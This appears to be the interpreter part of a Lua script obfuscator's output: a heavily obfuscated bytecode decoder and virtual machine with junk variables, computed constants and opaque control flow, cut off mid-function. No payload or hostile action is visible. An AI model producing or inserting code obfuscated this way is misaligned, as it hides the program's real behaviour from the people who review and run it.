local ZZZZZZn = "unpack";
local ZZZZZZi = "ldexp";
local ZZZZZZo = "char";
local a = "ldexp";
local t = "gsub";
local e = "sub";
local v0 = tonumber;
local v1 = string.byte;
local v2 = string[ZZZZZZo];
local v3 = string[e];
local v4 = string[t];
local v5 = string.rep;
local v6 = table.concat;
local v7 = table.insert;
local v8 = math[a];
local v9 = getfenv or function()
	return _ENV;
end;
local v10 = setmetatable;
local v11 = pcall;
local v12 = select;
local v13 = unpack or table[ZZZZZZn];
local v14 = tonumber;
local function v15(v16, v17, ...)
	local ZZZZZZh = 5;
	local ZZZZZZs = 1;
	local o = 1;
	local v18 = o;
	local v19;
	v16 = v4(v3(v16, ZZZZZZh), "..", function(v30)
		local ZZZZZZd = 81;
		local ZZZZZZr = 2;
		local i = 81;
		if (v1(v30, ZZZZZZr) == i) then
			local ZZZZZZl = true;
			local n = 0;
			local v81 = n;
			while ZZZZZZl do
				if (v81 == 0) then
					local ZZZZZZc = 1;
					local s = 1;
					v19 = v0(v3(v30, ZZZZZZc, s));
					return "";
				end
			end
		else
			local ZZZZZZu = true;
			local v82 = 0;
			local v83;
			while ZZZZZZu do
				local ZZZZZZm = 0;
				if (v82 == ZZZZZZm) then
					v83 = v2(v0(v30, 16));
					if v19 then
						local h = nil;
						local v99 = v5(v83, v19);
						v19 = h;
						return v99;
					else
						return v83;
					end
					break;
				end
			end
		end
	end);
	local function v20(v31, v32, v33)
		if v33 then
			local ZZZZZZj = 367;
			local ZZZZZZx = 932;
			local ZZZZZZk = 64;
			local ZZZZZZv = 555;
			local ZZZZZZb = 1;
			local ZZZZZZp = 3;
			local ZZZZZZy = 114;
			local ZZZZZZg = 1638;
			local ZZZZZZf = 2;
			local ZZZZZZw = 5;
			local p = 20;
			local y = 181;
			local g = 595;
			local f = 951;
			local w = 857;
			local m = 932;
			local u = 2;
			local c = 1;
			local l = 3;
			local d = 1523;
			local r = 1638;
			local v84 = (v31 / ((ZZZZZZw - 3) ^ (v32 - (ZZZZZZf - (r - (d + ZZZZZZy)))))) % ((l - c) ^ (((v33 - (u - ZZZZZZb)) - (v32 - (620 - (ZZZZZZv + ZZZZZZk)))) + (m - (w + (f - (282 + g))))));
			return v84 - (v84 % (569 - (ZZZZZZj + y + p)));
		else
			local ZZZZZZE = 713;
			local ZZZZZZz = 214;
			local ZZZZZZq = 927;
			local v = 214;
			local b = 927;
			local v85 = b - (v + ZZZZZZE);
			local v86;
			while true do
				local k = 0;
				if (v85 == k) then
					local ZZZZZZO = 0;
					local ZZZZZZA = 0;
					local ZZZZZZT = 0;
					local E = 0;
					local z = 0;
					local q = 0;
					local j = 1;
					local x = 2;
					v86 = x ^ (v32 - (j + q));
					return (((v31 % (v86 + v86)) >= v86) and 1) or (z + E);
				end
			end
		end
	end
	local function v21()
		local ZZZZZZI = 1;
		local v34 = v1(v16, v18, v18);
		v18 = v18 + ZZZZZZI;
		return v34;
	end
	local function v22()
		local ZZZZZZH = 68;
		local ZZZZZZS = 2;
		local ZZZZZZN = 2;
		local A = 997;
		local T = 2;
		local v35, v36 = v1(v16, v18, v18 + (T - 0));
		v18 = v18 + ZZZZZZS;
		return (v36 * (1321 - (ZZZZZZH + A))) + v35;
	end
	local function v23()
		local ZZZZZZG = 256;
		local ZZZZZZF = 1815;
		local ZZZZZZW = 3125;
		local ZZZZZZM = 64226;
		local ZZZZZZU = 65;
		local ZZZZZZC = 892;
		local ZZZZZZL = 1042;
		local ZZZZZZD = 32;
		local ZZZZZZR = 1044;
		local R = 256;
		local H = 1815;
		local S = 3125;
		local N = 892;
		local I = 32;
		local O = 1273;
		local v37, v38, v39, v40 = v1(v16, v18, v18 + (O - (51 + 175 + ZZZZZZR)));
		v18 = v18 + (17 - 13);
		return (v40 * (16777333 - (I + (ZZZZZZL - (N + ZZZZZZU))))) + (v39 * (ZZZZZZM + (S - H))) + (v38 * R) + v37;
	end
	local function v24()
		local ZZZZZZY = 0;
		local C = true;
		local L = 0;
		local D = 0;
		local v41 = D - L;
		local v42;
		local v43;
		local v44;
		local v45;
		local v46;
		local v47;
		while C do
			local ZZZZZZZw = 0;
			local ZZZZZZZo = 5;
			local ZZZZZZZa = 7;
			local ZZZZZZP = 0;
			local Za = 3;
			local Ze = 0;
			local Z = 0;
			local V = 7;
			local U = 1;
			if (v41 == (U - ZZZZZZP)) then
				local ZZZZZZZt = 0;
				local ZZZZZZZe = 0;
				local ZZZZZZZ = 2;
				local ZZZZZZQ = 32;
				local ZZZZZZJ = 2;
				local ZZZZZZX = 4;
				local ZZZZZZK = 15;
				local ZZZZZZV = 67;
				local ZZZZZZB = 351;
				local B = 4;
				local P = 15;
				local Y = 67;
				local G = 181;
				local F = 263;
				local W = 87;
				local M = 351;
				v44 = M - (W + F);
				v45 = (v20(v43, G - (Y + 113), P + 5) * ((B - ZZZZZZJ) ^ ZZZZZZQ)) + v42;
				v41 = ZZZZZZZ + ZZZZZZZe + ZZZZZZZt;
			end
			if ((V - ZZZZZZZo) == v41) then
				local ZZZZZZZm = 1;
				local ZZZZZZZu = 1;
				local ZZZZZZZc = 82;
				local ZZZZZZZl = 915;
				local ZZZZZZZd = 998;
				local ZZZZZZZr = 1;
				local ZZZZZZZh = 25;
				local ZZZZZZZs = 57;
				local ZZZZZZZn = 63;
				local ZZZZZZZi = 146;
				local Q = 1;
				local J = 2;
				local X = 82;
				local K = 973;
				v46 = v20(v43, K - (802 + 150), (ZZZZZZZi - ZZZZZZZn) - 52);
				v47 = ((v20(v43, ZZZZZZZs - ZZZZZZZh) == (ZZZZZZZr + 0)) and -(ZZZZZZZd - (ZZZZZZZl + X))) or (J - ZZZZZZZu);
				v41 = 2 + Q;
			end
			if (v41 == (Z - Ze)) then
				local ZZZZZZZb = 293;
				local ZZZZZZZp = 145;
				local ZZZZZZZy = 556;
				local ZZZZZZZg = 1069;
				local ZZZZZZZf = 1188;
				local Zt = 1188;
				v42 = v23();
				v43 = v23();
				v41 = Zt - (ZZZZZZZg + (ZZZZZZZy - (ZZZZZZZp + ZZZZZZZb)));
			end
			if (v41 == (6 - Za)) then
				local ZZZZZZZS = 113;
				local ZZZZZZZN = 571;
				local ZZZZZZZI = 2911;
				local ZZZZZZZO = 3222;
				local ZZZZZZZv = 0;
				local Zp = 113;
				local Zy = 571;
				local Zg = 201;
				local Zf = 444;
				local Zw = 3222;
				if (v46 == ZZZZZZZv) then
					local ZZZZZZZk = 0;
					local Zo = 0;
					if (v45 == (Zo - ZZZZZZZk)) then
						local Zi = 0;
						return v47 * (0 + Zi);
					else
						local ZZZZZZZq = 0;
						local ZZZZZZZj = 0;
						local ZZZZZZZx = 386;
						local Zn = 0;
						v46 = (431 - (44 + ZZZZZZZx)) - 0;
						v44 = Zn + ZZZZZZZq;
					end
				else
					local ZZZZZZZz = 488;
					local Zr = 488;
					local Zh = 368;
					local Zs = 2838;
					if (v46 == (Zs - (Zh + (1909 - (998 + Zr))))) then
						local ZZZZZZZA = 6;
						local ZZZZZZZT = 18;
						local ZZZZZZZE = 0;
						local Zm = 4;
						local Zu = 18;
						local Zc = 1;
						local Zl = 0;
						local Zd = 0;
						return ((v45 == (Zd - Zl)) and (v47 * (Zc / (Zu - (Zm + ZZZZZZZA + 8))))) or (v47 * NaN);
					end
				end
				return v8(v47, v46 - ((Zw + 712) - ZZZZZZZI)) * (v44 + (v45 / ((Zf - (416 + (798 - (Zg + Zy)))) ^ (165 - Zp))));
			end
		end
	end
	local function v25(v48)
		local ZZZZZZZW = 2;
		local Zz = 1;
		local v49;
		if not v48 then
			local ZZZZZZZL = true;
			local ZZZZZZZD = 1022;
			local ZZZZZZZR = 2903;
			local ZZZZZZZH = 4041;
			local Zv = true;
			local Zb = 116;
			local v87 = (ZZZZZZZH - ZZZZZZZR) - (Zb + ZZZZZZZD);
			while Zv do
				local ZZZZZZZC = 0;
				local Zk = 0;
				if (v87 == (Zk - ZZZZZZZC)) then
					local ZZZZZZZU = 0;
					local Zj = 0;
					local Zx = 0;
					v48 = v23();
					if (v48 == (Zx + Zj)) then
						local ZZZZZZZM = "";
						local Zq = "";
						return Zq;
					end
					break;
				end
			end
		end
		v49 = v3(v16, v18, (v18 + v48) - (3 - ZZZZZZZW));
		v18 = v18 + v48;
		local v50 = {};
		for v64 = Zz, #v49 do
			v50[v64] = v2(v1(v3(v49, v64, v64)));
		end
		return v6(v50);
	end
	local v26 = v23;
	local function v27(...)
		local ZT = "#";
		local ZE = 1;
		return {...}, v12(ZT, ...);
	end
	local function v28()
		local ZZZZZZZF = true;
		local ZO = true;
		local v51 = (function()
			local ZA = 0;
			return ZA;
		end)();
		local v52 = (function()
			return;
		end)();
		local v53 = (function()
			return;
		end)();
		local v54 = (function()
			return;
		end)();
		local v55 = (function()
			return;
		end)();
		local v56 = (function()
			return;
		end)();
		local v57 = (function()
			return;
		end)();
		while ZO do
			local v66 = (function()
				local ZZZZZZZG = 1521;
				local ZS = 1521;
				local ZN = 301;
				local ZI = 1822;
				return ZI - (ZN + ZS);
			end)();
			while true do
				local ZZZZZZZZM = 1;
				local ZZZZZZZP = 0;
				local ZZZZZZZY = 0;
				local ZH = 0;
				if (v66 == (ZH - ZZZZZZZP)) then
					local ZZZZZZZV = 706;
					local ZZZZZZZB = 1024;
					local ZL = 318;
					local ZD = 706;
					local ZR = 1024;
					if (v51 ~= (ZR - (ZD + ZL))) then
					else
						local ZZZZZZZX = true;
						local v96 = (function()
							local ZZZZZZZK = 0;
							local ZU = 0;
							local ZC = 0;
							return ZC + ZU;
						end)();
						while ZZZZZZZX do
							local ZZZZZZZZt = 429;
							local ZZZZZZZZe = 271;
							local ZZZZZZZZ = 5;
							local ZW = 0;
							local ZM = 1;
							if (v96 == (ZM - ZW)) then
								v54 = (function()
									return {};
								end)();
								v55 = (function()
									local ZZZZZZZJ = 2;
									local ZF = 3;
									return {v52,v53,nil,v54};
								end)();
								v96 = (function()
									local ZZZZZZZQ = 2;
									return ZZZZZZZQ;
								end)();
							end
							if (v96 ~= (ZZZZZZZZ - 3)) then
							else
								v51 = (function()
									local ZG = "[";
									return #ZG;
								end)();
								break;
							end
							if ((700 - (ZZZZZZZZe + ZZZZZZZZt)) ~= v96) then
							else
								v52 = (function()
									return {};
								end)();
								v53 = (function()
									return {};
								end)();
								v96 = (function()
									local ZZZZZZZZa = 1;
									local ZY = 1;
									return ZY;
								end)();
							end
						end
					end
					if (v51 == #"!") then
						local ZP = true;
						local v97 = (function()
							local ZZZZZZZZo = 0;
							return ZZZZZZZZo;
						end)();
						local v98 = (function()
							return;
						end)();
						while ZP do
							local ZZZZZZZZi = 0;
							local ZB = 0;
							if (v97 == ZB) then
								v98 = (function()
									local ZZZZZZZZs = 281;
									local ZZZZZZZZn = 1419;
									local ZV = 1700;
									return ZV - (ZZZZZZZZn + ZZZZZZZZs);
								end)();
								while true do
									local ZZZZZZZZL = 2;
									local ZZZZZZZZc = 993;
									local ZZZZZZZZr = 0;
									local ZZZZZZZZh = 0;
									local ZZq = 0;
									local ZZj = 2;
									local ZJ = 993;
									local ZX = 1289;
									local ZK = 0;
									if (v98 ~= (ZZZZZZZZh - ZK)) then
									else
										v56 = (function()
											return v23();
										end)();
										v57 = (function()
											return {};
										end)();
										v98 = (function()
											local ZZZZZZZZl = 625;
											local ZZZZZZZZd = 1087;
											return ZZZZZZZZd - (461 + ZZZZZZZZl);
										end)();
									end
									if ((ZX - (ZJ + 295)) ~= v98) then
									else
										local ZZZZZZZZu = "[";
										local ZQ = "[";
										for v146 = #ZQ, v56 do
											local v147 = (function()
												local ZZZZZZZZw = 3;
												local ZZZZZZZZm = 74;
												local ZZe = 3;
												local ZZ = 71;
												return ZZZZZZZZm - (ZZ + ZZe);
											end)();
											local v148 = (function()
												return;
											end)();
											local v149 = (function()
												return;
											end)();
											local v150 = (function()
												return;
											end)();
											while true do
												local ZZZZZZZZA = 0;
												local ZZZZZZZZT = 0;
												local ZZg = 0;
												local ZZa = 0;
												local ZZt = 1;
												if (v147 == (ZZt + ZZa)) then
													local ZZZZZZZZf = true;
													local ZZo = true;
													v150 = (function()
														return nil;
													end)();
													while ZZo do
														local ZZZZZZZZb = 0;
														local ZZZZZZZZy = 0;
														local ZZZZZZZZg = 1;
														local ZZi = 0;
														if (v148 == (ZZZZZZZZg + ZZi)) then
															if (v149 == #"\\") then
																v150 = (function()
																	local ZZn = 0;
																	return v21() ~= ZZn;
																end)();
															else
																local ZZZZZZZZp = 4;
																local ZZh = 2;
																local ZZs = 4;
																if (v149 == (ZZs - ZZh)) then
																	v150 = (function()
																		return v24();
																	end)();
																elseif (v149 == #"xxx") then
																	v150 = (function()
																		return v25();
																	end)();
																end
															end
															v57[v146] = (function()
																return v150;
															end)();
															break;
														end
														if (v148 == ZZZZZZZZb) then
															local ZZl = true;
															local v173 = (function()
																local ZZZZZZZZv = 0;
																local ZZd = 0;
																local ZZr = 0;
																return ZZr - ZZd;
															end)();
															while ZZl do
																local ZZZZZZZZj = 0;
																if (1 == v173) then
																	v148 = (function()
																		local ZZZZZZZZx = 54;
																		local ZZZZZZZZk = 187;
																		local ZZu = 54;
																		local ZZc = 187;
																		return 242 - (ZZc + ZZu);
																	end)();
																	break;
																end
																if (ZZZZZZZZj == v173) then
																	v149 = (function()
																		return v21();
																	end)();
																	v150 = (function()
																		return nil;
																	end)();
																	v173 = (function()
																		local ZZZZZZZZE = 618;
																		local ZZZZZZZZz = 162;
																		local ZZZZZZZZq = 781;
																		local ZZf = 618;
																		local ZZw = 162;
																		local ZZm = 781;
																		return ZZm - (ZZw + ZZf);
																	end)();
																end
															end
														end
													end
													break;
												end
												if (v147 ~= (ZZg + ZZZZZZZZA)) then
												else
													local ZZp = true;
													local v169 = (function()
														local ZZy = 529;
														return ZZy - (406 + 123);
													end)();
													while ZZp do
														local ZZZZZZZZH = 0;
														local ZZZZZZZZS = 1;
														local ZZZZZZZZO = 0;
														if ((0 + ZZZZZZZZO) == v169) then
															v148 = (function()
																return 0;
															end)();
															v149 = (function()
																return nil;
															end)();
															v169 = (function()
																local ZZZZZZZZN = 1749;
																local ZZZZZZZZI = 1770;
																local ZZv = 20;
																local ZZb = 1749;
																return ZZZZZZZZI - (ZZb + ZZv);
															end)();
														end
														if (v169 ~= (ZZZZZZZZS - ZZZZZZZZH)) then
														else
															v147 = (function()
																local ZZZZZZZZR = 1;
																local ZZx = 0;
																local ZZk = 1;
																return ZZk + ZZx;
															end)();
															break;
														end
													end
												end
											end
										end
										v55[#"-19"] = (function()
											return v21();
										end)();
										v98 = (function()
											local ZZZZZZZZD = 2;
											return ZZZZZZZZD;
										end)();
									end
									if (v98 ~= (ZZj - ZZq)) then
									else
										v51 = (function()
											local ZZz = 2;
											return ZZz;
										end)();
										break;
									end
								end
								break;
							end
						end
					end
					v66 = (function()
						local ZZZZZZZZU = 0;
						local ZZZZZZZZC = 1;
						local ZZE = 0;
						return ZZZZZZZZC + ZZE;
					end)();
				end
				if (v66 ~= ZZZZZZZZM) then
				else
					local ZZZZZZZZF = 263;
					local ZZZZZZZZW = 1373;
					local ZZA = 1373;
					local ZZT = 1638;
					if (v51 ~= (ZZT - (ZZA + ZZZZZZZZF))) then
					else
						local ZZZZZZZZZZo = ",";
						for v100 = #"\\", v23() do
							local ZZZZZZZZB = 549;
							local ZZZZZZZZP = 451;
							local ZZZZZZZZY = "!";
							local ZZZZZZZZG = "\\";
							local ZZN = 451;
							local ZZI = "!";
							local ZZO = "\\";
							local v101 = (function()
								return v21();
							end)();
							if (v20(v101, #ZZO, #ZZI) ~= (1000 - (ZZN + ZZZZZZZZB))) then
							else
								local ZZR = true;
								local v104 = (function()
									local ZZZZZZZZV = 0;
									local ZZH = 0;
									local ZZS = 0;
									return ZZS + ZZH;
								end)();
								local v105 = (function()
									return;
								end)();
								local v106 = (function()
									return;
								end)();
								local v107 = (function()
									return;
								end)();
								while ZZR do
									local ZZZZZZZZZG = 6;
									local ZZZZZZZZZh = 0;
									local ZZZe = 0;
									local ZZZ = 1;
									local ZZW = 0;
									local ZZD = 3;
									if (v104 == ZZD) then
										local ZZZZZZZZJ = "\\";
										local ZZZZZZZZX = "xxx";
										local ZZZZZZZZK = "-19";
										local ZZU = "\\";
										local ZZC = "xxx";
										local ZZL = "-19";
										if (v20(v106, #ZZL, #ZZC) == #ZZU) then
											local ZZM = "0836";
											v107[#ZZM] = (function()
												return v57[v107[#"0836"]];
											end)();
										end
										v52[v100] = (function()
											return v107;
										end)();
										break;
									end
									if (v104 == ZZW) then
										local ZZG = true;
										local v141 = (function()
											local ZZZZZZZZQ = 466;
											local ZZF = 679;
											return 1145 - (ZZZZZZZZQ + ZZF);
										end)();
										local v142 = (function()
											return;
										end)();
										while ZZG do
											local ZZZZZZZZZ = 0;
											if (ZZZZZZZZZ ~= v141) then
											else
												v142 = (function()
													local ZZZZZZZZZe = 0;
													local ZZY = 0;
													return ZZY - 0;
												end)();
												while true do
													local ZZJ = 0;
													local ZZX = 1;
													local ZZP = 0;
													if (ZZP ~= v142) then
													else
														v105 = (function()
															local ZZZZZZZZZa = "xxx";
															local ZZZZZZZZZt = 0;
															local ZZB = 0;
															return v20(v101, 2 - ZZB, #ZZZZZZZZZa);
														end)();
														v106 = (function()
															local ZZZZZZZZZi = 746;
															local ZZZZZZZZZo = 1390;
															local ZZV = 1390;
															return v20(v101, #".dev", ZZV - (ZZZZZZZZZi + 638));
														end)();
														v142 = (function()
															local ZZK = 1;
															return ZZK + 0;
														end)();
													end
													if (v142 == (ZZX + ZZJ)) then
														v104 = (function()
															local ZZZZZZZZZs = 0;
															local ZZZZZZZZZn = 1;
															local ZZQ = 0;
															return ZZZZZZZZZn - ZZQ;
														end)();
														break;
													end
												end
												break;
											end
										end
									end
									if (v104 == (ZZZ + ZZZe)) then
										local ZZZZZZZZZl = true;
										local ZZZi = true;
										local v143 = (function()
											local ZZZZZZZZZd = 123;
											local ZZZZZZZZZr = 218;
											local ZZZo = 123;
											local ZZZa = 218;
											local ZZZt = 341;
											return ZZZt - (ZZZa + ZZZo);
										end)();
										while ZZZi do
											local ZZZZZZZZZu = 46;
											local ZZZZZZZZZc = 1535;
											local ZZZh = 0;
											local ZZZs = 0;
											local ZZZn = 46;
											if (v143 == (1582 - (ZZZZZZZZZc + ZZZn))) then
												v104 = (function()
													return 2;
												end)();
												break;
											end
											if (v143 ~= (ZZZs + ZZZh)) then
											else
												local ZZZf = 0;
												local ZZZw = 0;
												v107 = (function()
													local ZZZZZZZZZf = nil;
													local ZZZZZZZZZw = 3;
													local ZZZZZZZZZm = 2;
													local ZZZm = nil;
													local ZZZu = 4;
													local ZZZc = nil;
													local ZZZl = 3;
													local ZZZd = 2;
													local ZZZr = 1;
													return {v22(),v22(),ZZZc,ZZZm};
												end)();
												if (v105 == (ZZZw + ZZZf)) then
													local ZZZg = true;
													local v170 = (function()
														return 0;
													end)();
													local v171 = (function()
														return;
													end)();
													while ZZZg do
														local ZZZZZZZZZy = 306;
														local ZZZZZZZZZg = 560;
														local ZZZp = 254;
														local ZZZy = 306;
														if (v170 == (ZZZZZZZZZg - (ZZZy + ZZZp))) then
															v171 = (function()
																local ZZZZZZZZZp = 0;
																local ZZZb = 0;
																return 0 + ZZZb;
															end)();
															while true do
																local ZZZZZZZZZv = 41;
																local ZZZZZZZZZb = 1427;
																local ZZZk = 1386;
																local ZZZv = 41;
																if (v171 == (ZZZZZZZZZb - (ZZZv + ZZZk))) then
																	local ZZZZZZZZZx = ".dev";
																	local ZZZZZZZZZk = "asd";
																	v107[#ZZZZZZZZZk] = (function()
																		return v22();
																	end)();
																	v107[#ZZZZZZZZZx] = (function()
																		return v22();
																	end)();
																	break;
																end
															end
															break;
														end
													end
												else
													local ZZZZZZZZZj = ">";
													if (v105 == #ZZZZZZZZZj) then
														local ZZZZZZZZZq = "-19";
														v107[#ZZZZZZZZZq] = (function()
															return v23();
														end)();
													else
														local ZZZZZZZZZz = 3;
														local ZZZx = 3;
														if (v105 == (ZZZx - 1)) then
															local ZZZZZZZZZE = "asd";
															v107[#ZZZZZZZZZE] = (function()
																local ZZZZZZZZZO = 568;
																local ZZZZZZZZZA = 899;
																local ZZZZZZZZZT = 1469;
																local ZZZq = 5;
																local ZZZj = 11;
																return v23() - ((ZZZZZZZZZT - (ZZZZZZZZZA + ZZZZZZZZZO)) ^ (ZZZj + ZZZq));
															end)();
														else
															local ZZZZZZZZZI = "91(";
															if (v105 == #ZZZZZZZZZI) then
																local ZZZE = true;
																local v178 = (function()
																	local ZZZZZZZZZN = 0;
																	local ZZZz = 0;
																	return ZZZz;
																end)();
																local v179 = (function()
																	return;
																end)();
																while ZZZE do
																	local ZZZZZZZZZS = 0;
																	local ZZZT = 0;
																	if ((0 + ZZZT) ~= v178) then
																	else
																		local ZZZI = true;
																		v179 = (function()
																			local ZZZZZZZZZR = 0;
																			local ZZZZZZZZZH = 0;
																			local ZZZO = 0;
																			local ZZZA = 0;
																			return ZZZA - ZZZO;
																		end)();
																		while ZZZI do
																			local ZZZZZZZZZD = 0;
																			local ZZZN = 0;
																			if (ZZZN ~= v179) then
																			else
																				local ZZZZZZZZZL = "xxx";
																				local ZZZD = "asd1";
																				v107[#ZZZZZZZZZL] = (function()
																					local ZZZZZZZZZM = 22;
																					local ZZZZZZZZZU = 3;
																					local ZZZZZZZZZC = 5;
																					local ZZZR = 38;
																					local ZZZH = 3;
																					local ZZZS = 5;
																					return v23() - ((ZZZS - ZZZH) ^ (ZZZR - ZZZZZZZZZM));
																				end)();
																				v107[#ZZZD] = (function()
																					return v22();
																				end)();
																				break;
																			end
																		end
																		break;
																	end
																end
															end
														end
													end
												end
												v143 = (function()
													local ZZZZZZZZZF = 335;
													local ZZZZZZZZZW = 268;
													local ZZZU = 335;
													local ZZZC = 268;
													local ZZZL = 604;
													return ZZZL - (ZZZC + ZZZU);
												end)();
											end
										end
									end
									if ((ZZZZZZZZZG - 4) ~= v104) then
									else
										local ZZZZZZZZZZe = "}";
										local ZZZZZZZZZZ = 1174;
										local ZZZZZZZZZQ = 282;
										local ZZZZZZZZZJ = 1458;
										local ZZZZZZZZZB = ">";
										local ZZZZZZZZZP = "<";
										local ZZZZZZZZZY = "{";
										local ZZZB = 1458;
										local ZZZP = 1;
										local ZZZY = 1;
										local ZZZW = ">";
										local ZZZM = "{";
										if (v20(v106, #ZZZM, #ZZZZZZZZZP) == #ZZZW) then
											local ZZZZZZZZZK = 230;
											local ZZZZZZZZZV = 60;
											local ZZZG = 60;
											local ZZZF = 292;
											v107[ZZZF - (ZZZG + ZZZZZZZZZK)] = (function()
												local ZZZZZZZZZX = 146;
												return v57[v107[574 - (426 + ZZZZZZZZZX)]];
											end)();
										end
										if (v20(v106, ZZZY + ZZZP, ZZZB - (ZZZZZZZZZQ + ZZZZZZZZZZ)) == #ZZZZZZZZZZe) then
											local ZZZV = "19(";
											v107[#ZZZV] = (function()
												return v57[v107[#"19("]];
											end)();
										end
										v104 = (function()
											local ZZZZZZZZZZa = 242;
											local ZZZZZZZZZZt = 569;
											local ZZZK = 242;
											return 814 - (ZZZZZZZZZZt + ZZZK);
										end)();
									end
								end
							end
						end
						for v102 = #ZZZZZZZZZZo, v23() do
							local ZZZX = ">";
							v53[v102 - #ZZZX] = (function()
								return v28();
							end)();
						end
						return v55;
					end
					break;
				end
			end
		end
	end
	local function v29(v58, v59, v60)
		local ZZZZZZZZZZr = 301;
		local ZZZZZZZZZZh = 144;
		local ZZZZZZZZZZs = 339;
		local ZZZZZZZZZZn = 2;
		local ZZZZZZZZZZi = 0;
		local ZZZZ = 493;
		local ZZZQ = 144;
		local ZZZJ = 339;
		local v61 = v58[(1 + ZZZZZZZZZZi) - 0];
		local v62 = v58[ZZZZZZZZZZn - 0];
		local v63 = v58[ZZZJ - (ZZZQ + (ZZZZ - ZZZZZZZZZZr))];
		return function(...)
			local ZZZZZZZZZZx = 214;
			local ZZZZZZZZZZk = 798;
			local ZZZZZZZZZZv = 245;
			local ZZZZZZZZZZb = 1258;
			local ZZZZZZZZZZy = 1374;
			local ZZZZZZZZZZg = 0;
			local ZZZZZZZZZZf = 1;
			local ZZZZZZZZZZw = 35;
			local ZZZZZZZZZZm = 30;
			local ZZZZZZZZZZu = 66;
			local ZZZZZZZZZZc = 174;
			local ZZZZZZZZZZl = 100;
			local ZZZZZZZZZZd = 304;
			local ZZZZs = 363;
			local ZZZZn = 130;
			local ZZZZi = 0;
			local ZZZZo = 1;
			local ZZZZa = 35;
			local ZZZZt = 30;
			local ZZZZe = 174;
			local v67 = v61;
			local v68 = v62;
			local v69 = v63;
			local v70 = v27;
			local v71 = (521 - ZZZZZZZZZZd) - ((ZZZZZZZZZZl - 58) + ZZZZe);
			local v72 = -(ZZZZZZZZZZu - (ZZZZt + ZZZZa));
			local v73 = {};
			local v74 = {...};
			local v75 = v12("#", ...) - (ZZZZo + ZZZZi);
			local v76 = {};
			local v77 = {};
			for v88 = (ZZZZn + ZZZZZZZZZZy) - (ZZZZs + 1141), v75 do
				if (v88 >= v69) then
					local ZZZZZZZZZZp = 1;
					local ZZZZh = 1;
					v73[v88 - v69] = v74[v88 + ZZZZh];
				else
					local ZZZZr = 1;
					v77[v88] = v74[v88 + ZZZZr];
				end
			end
			local v78 = (v75 - v69) + (ZZZZZZZZZZb - (ZZZZZZZZZZv + ZZZZZZZZZZk + ZZZZZZZZZZx));
			local v79;
			local v80;
			while true do
				local ZZZZZZZZZZq = 397;
				local ZZZZZZZZZZj = 1580;
				local ZZZZc = true;
				local ZZZZl = 397;
				local ZZZZd = 1580;
				local v89 = ZZZZd - (1183 + ZZZZl);
				while ZZZZc do
					local ZZZZZZZZZZO = 581;
					local ZZZZZZZZZZE = 2037;
					local ZZZZZZZZZZz = 0;
					local ZZZZf = 219;
					local ZZZZm = 0;
					local ZZZZu = 0;
					if ((v89 == ((0 - ZZZZu) - ZZZZm)) or (ZZZZZZZZZZE >= 4642)) then
						local ZZZZZZZZZZA = 1;
						local ZZZZZZZZZZT = 2;
						local ZZZZw = 2;
						v79 = v67[v71];
						v80 = v79[1213 - (323 + 889)];
						v89 = ZZZZw - ZZZZZZZZZZA;
					end
					if (v89 == (ZZZZZZZZZZO - (361 + ZZZZf))) then
						local ZZZZZZZZZZZZG = 174;
						local ZZZZZZZZZZZZF = 64;
						local ZZZZZZZZZZS = 569;
						local ZZZZZZZZZZN = 1743;
						local ZZZZZZZZZZI = 323;
						local ZZZZZZa = 239;
						local ZZZZy = 267;
						local ZZZZg = 323;
						if (v80 <= (ZZZZg - ((ZZZZZZZZZZN - (1121 + ZZZZZZZZZZS)) + ZZZZy))) then
							local ZZZZZZZZZZH = 1720;
							local ZZZZp = 1720;
							if ((ZZZZp < 4458) and (v80 <= (1 + 0))) then
								local ZZZZZZZZZZD = 15;
								local ZZZZZZZZZZR = 413;
								local ZZZZv = 3224;
								local ZZZZb = 398;
								if ((v80 == (ZZZZZZZZZZR - (ZZZZZZZZZZD + ZZZZb))) or (33 >= ZZZZv)) then
									local ZZZZZZZZZZC = true;
									local ZZZZZZZZZZL = 0;
									local ZZZZx = true;
									local ZZZZk = 0;
									local v108 = ZZZZZZZZZZL - ZZZZk;
									local v109;
									local v110;
									local v111;
									local v112;
									while ZZZZx do
										local ZZZZZZZZZZQ = 116;
										local ZZZZZZZZZZJ = 127;
										local ZZZZZZZZZZV = 830;
										local ZZZZZZZZZZB = 20;
										local ZZZZZZZZZZP = 852;
										local ZZZZZZZZZZM = 1368;
										local ZZZZZZZZZZU = 1933;
										local ZZZZH = 10;
										local ZZZZN = 20;
										local ZZZZj = 1368;
										if (v108 == (ZZZZZZZZZZU - (565 + ZZZZj))) then
											local ZZZZZZZZZZY = 1;
											local ZZZZZZZZZZG = 2;
											local ZZZZZZZZZZF = 2;
											local ZZZZZZZZZZW = 3;
											local ZZZZI = 0;
											local ZZZZO = 1;
											local ZZZZA = 1;
											local ZZZZT = 2;
											local ZZZZE = 3;
											local ZZZZz = 18;
											local ZZZZq = 984;
											v109 = v79[ZZZZq - (ZZZZz + 964)];
											v110, v111 = v70(v77[v109](v13(v77, v109 + (ZZZZE - ZZZZT), v79[ZZZZZZZZZZG + ZZZZA])));
											v108 = ZZZZO + ZZZZI;
										end
										if ((v108 == (ZZZZZZZZZZP - (ZZZZN + ZZZZZZZZZZV))) or (436 > 3021)) then
											for v164 = v109, v72 do
												local ZZZZZZZZZZX = 0;
												local ZZZZZZZZZZK = 1;
												local ZZZZS = 1;
												v112 = v112 + ZZZZS + ZZZZZZZZZZX;
												v77[v164] = v110[v112];
											end
											break;
										end
										if (v108 == (ZZZZZZZZZZJ - (ZZZZZZZZZZQ + ZZZZH))) then
											local ZZZZZZZZZZZi = 2;
											local ZZZZZZZZZZZo = 192;
											local ZZZZZZZZZZZa = 410;
											local ZZZZZZZZZZZt = 542;
											local ZZZZZZZZZZZe = 738;
											local ZZZZZZZZZZZ = 1;
											local ZZZZC = 22;
											local ZZZZL = 542;
											local ZZZZD = 0;
											local ZZZZR = 1;
											v72 = (v111 + v109) - (ZZZZR + ZZZZD);
											v112 = ZZZZZZZZZZZe - (ZZZZL + (ZZZZZZZZZZZa - (ZZZZC + ZZZZZZZZZZZo)));
											v108 = ZZZZZZZZZZZi + 0;
										end
									end
								else
									local ZZZZZZZZZZZZo = 0;
									local ZZZZZZZZZZZZa = 1;
									local ZZZZZZZZZZZZt = 0;
									local ZZZZZZZZZZZZe = 0;
									local ZZZZZZZZZZZZ = 2;
									local ZZZZZZZZZZZQ = 0;
									local ZZZZZZZZZZZJ = 1;
									local ZZZZZZZZZZZX = 0;
									local ZZZZZZZZZZZK = 1;
									local ZZZZZZZZZZZV = 0;
									local ZZZZZZZZZZZB = 1;
